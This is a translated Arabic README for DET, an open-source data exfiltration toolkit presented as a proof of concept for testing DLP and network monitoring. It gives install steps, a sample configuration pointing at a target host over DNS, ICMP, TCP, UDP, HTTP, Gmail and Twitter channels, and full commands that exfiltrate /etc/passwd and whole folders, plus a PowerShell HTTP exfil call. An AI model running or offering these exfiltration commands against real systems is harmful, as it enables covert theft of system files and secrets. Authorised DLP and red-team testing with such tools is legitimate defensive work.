
(قابلة للتوسيع) أداة استخراج البيانات (DET)
DET (مُقدَّم كما هو) هو برهان مفهوم لإجراء تسريب البيانات باستخدام قناة واحدة أو عدة قنوات في الوقت نفسه.
هذا برهان مفهوم يهدف إلى تحديد نقاط فشل محتملة في أنظمة منع تسرب البيانات (DLP). لا ينبغي أبدًا استخدامه لتسريب بيانات حسّاسة/حية (مثلاً في تقييم)
الفكرة كانت إنشاء مجموعة أدوات عامة لتوصيل أي نوع من البروتوكولات/الخدمات لاختبار تكوين حلول مراقبة الشبكة ومنع تسرب البيانات (DLP) ضد تقنيات تسريب البيانات المختلفة.
المستودع الرئيسي انتقل الآن إلى هنا.
عُرض DET في BSides Ljubljana في 9 مارس 2016 وستكون الشرائح متاحة هنا. الشرائح متاحة هنا.
استنساخ المستودع:
git clone https://github.com/sensepost/DET.git
ثم:
pip install -r requirements.txt --user
لاستخدام DET، ستحتاج إلى تكوينه وإضافة الإعدادات المناسبة (مثل SMTP/IMAP، عبارة مرور تشفير AES256، إلخ). تم توفير ملف مثال للتكوين باسم: config-sample.json
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "[email protected]",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
لتحميل كل إضافة:
python det.py -L -c ./config.json
لتحميل وحدات twitter و gmail فقط:
python det.py -L -c ./config.json -p twitter,gmail
لتحميل كل إضافة واستبعاد DNS:
python det.py -L -c ./config.json -e dns
لتحميل كل إضافة:
python det.py -c ./config.json -f /etc/passwd
لتحميل وحدات twitter و gmail فقط:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
لتحميل كل إضافة واستبعاد DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
وفي PowerShell (وحدة HTTP):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
حتى الآن، يدعم DET بروتوكولات متعددة، مدرجة هنا:
و"خدمات" أخرى:
حتى الآن، أنا مشغول بتنفيذ وحدات جديدة جاهزة تقريبًا للشحن، بما في ذلك:
بعض المراجع/الاعتمادات الرائعة للأشخاص الذين استلهمت منهم بمشاريعهم:
يمكنك التواصل معي على Twitter @PaulWebSec. لا تتردد إذا كنت ترغب في المساهمة، استنساخ، تفريع، تقديم طلب سحب (PR) وما إلى ذلك.
DET مرخص بموجب رخصة MIT. يمكن الحصول على أذونات تتجاوز نطاق هذه الرخصة على [email protected]